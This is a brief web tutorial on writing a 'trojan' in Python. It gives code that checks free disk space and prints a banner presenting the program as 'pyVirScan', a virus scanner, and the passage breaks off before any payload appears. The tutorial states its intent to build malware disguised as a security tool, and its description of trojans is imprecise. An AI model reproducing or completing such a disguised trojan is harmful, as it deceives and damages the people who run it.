Trojen Virus Trojans are the most infamous viruses in computer world which can make your PC damn slow and it sometimes also crash the pc. Here we are making a trojan in python language. So let's start 1. Copy and paste the following code in notepad : # tokzikate's trojan import win32file import os def get_drivestats (): #This retrieves the amount of free space on the drive in bytes drive = os.path.splitdrive ( os.getcwd ())[0]. rstrip (':') sectPerCluster , bytesPerSector , freeClusters , totalClusters = \ win32file.GetDiskFreeSpace ( drive + ":\\") free_space = freeClusters * sectPerCluster * bytesPerSector return free_space , drive print ("-"*40) print ("-" + " " * 9 + " Welcome to pyVirScan " + " " * 9 + "-") print ("-" + " " * 2 + "A Virus Scanner written in Python !" + " " * 2 + "-") print ("-" + " "...